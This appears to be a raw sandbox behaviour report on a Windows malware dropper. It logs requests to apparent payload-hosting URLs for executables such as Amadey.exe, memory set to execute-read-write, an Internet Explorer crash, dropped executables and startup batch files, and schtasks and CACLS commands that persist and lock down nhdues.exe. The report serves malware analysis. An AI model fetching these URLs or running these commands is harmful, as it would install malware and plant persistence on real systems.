suspicious_features GET method with no useragent header suspicious_request GET https://grabyourpizza.com/7a54bdb20779c4359694feaa1398dd25.exe
suspicious_features GET method with no useragent header suspicious_request GET https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe
suspicious_features GET method with no useragent header suspicious_request GET https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe
request GET http://172.86.97.117/himeffectivelyproress.exe
request GET http://85.217.144.143/files/Amadey.exe
request GET http://85.217.144.143/files/My2.exe
request GET http://galandskiyher5.com/downloads/toolspub1.exe
request GET http://gons01b.top/build.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
request GET http://104.194.128.170/svp/Ykwrxaauw.dat
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://pastebin.com/raw/HPj0MzD6
request GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
request GET https://grabyourpizza.com/7a54bdb20779c4359694feaa1398dd25.exe
request GET https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe
request GET https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe
domain gons01b.top description Generic top level domain TLD
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00550000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00660000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00432000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00565000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00567000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00556000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 77824
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c2e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2456
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 192512
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008fe000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2640
region_size: 331776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4161536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02640000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 9351168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4161536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02820000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 9351168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2148
region_size: 13570048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2148
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03430000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7561c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7563c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7561c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7563c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70813000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x708b7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76af9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75ac2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75602000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2148
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2148
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e761000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2844
region_size: 1314816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ce0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2844
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2844
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2148 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 96335116
registers.edi: 8775908
registers.eax: 96335116
registers.ebp: 96335196
registers.edx: 618
registers.ebx: 96335480
registers.esi: 2147746133
registers.ecx: 81507464
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6f12540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6f1252ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6f200ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 64871344
registers.edi: 1974991376
registers.eax: 64871344
registers.ebp: 64871424
registers.edx: 1
registers.ebx: 9031580
registers.esi: 2147746133
registers.ecx: 1925805225
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wjix28kKarinpgjAYr9zDmpj.bat
file C:\Users\test22\AppData\Local\40VNMGBt49jJ8V6q7umTXrGg.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SaAj8ddbQ8wkYIxlMtU24PeF.bat
file C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
file C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esNy7rk0zmYx5Vbij5LA4Nl6.bat
file C:\Users\test22\Pictures\Opera_installer_2310190227557342164.dll
file C:\Users\test22\AppData\Local\SzrkbvqI3iFiEux3stVgjl0M.exe
file C:\Users\test22\AppData\Local\NbPpc3pDAZzoBkBuL7TzDyCB.exe
file C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\hime.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\himeffectively.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KkUIGNWOEZ7SF0rQw5yOyBqw.bat
file C:\Users\test22\AppData\Local\97bebconSjePqzu2Nd0t5L6F.exe
file C:\Users\test22\AppData\Local\Iq88uLPVUOWqnumlAHokPFqD.exe
file C:\Users\test22\AppData\Local\c7Faqutu18vIy1LPj9FdgPAf.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ny6g2bRbZ1WF9N4OGUF7Y267.bat
file C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
file C:\Users\test22\AppData\Local\Temp\Opera_installer_2310190227556712164.dll
file C:\Users\test22\AppData\Local\qFAU3pIQGQ63Dq6IbWwB1ZkI.exe
file C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
file C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\seatdesigner.exe
file C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
file C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
file C:\Users\test22\AppData\Local\JsmUdKHC65rMj8moaXLLvvsH.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6p1uypRGfTUYYgl5UZ64RlVm.bat
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\untilmathematicspro.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hjWYWkkCY8Nyq0IVvM6rdei6.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKmS6R2JXaTleGwL2IM1fGi1.bat
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\seatdesigner.exe
file C:\Users\test22\AppData\Local\SzrkbvqI3iFiEux3stVgjl0M.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe
parameters:
filepath: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
parameters:
filepath: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
parameters:
filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
parameters:
filepath: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
parameters:
filepath: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
parameters:
filepath: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
parameters:
filepath: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe
parameters: --silent --allusers=0
filepath: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2844
stack_dep_bypass: 0
stack_pivoted: 0
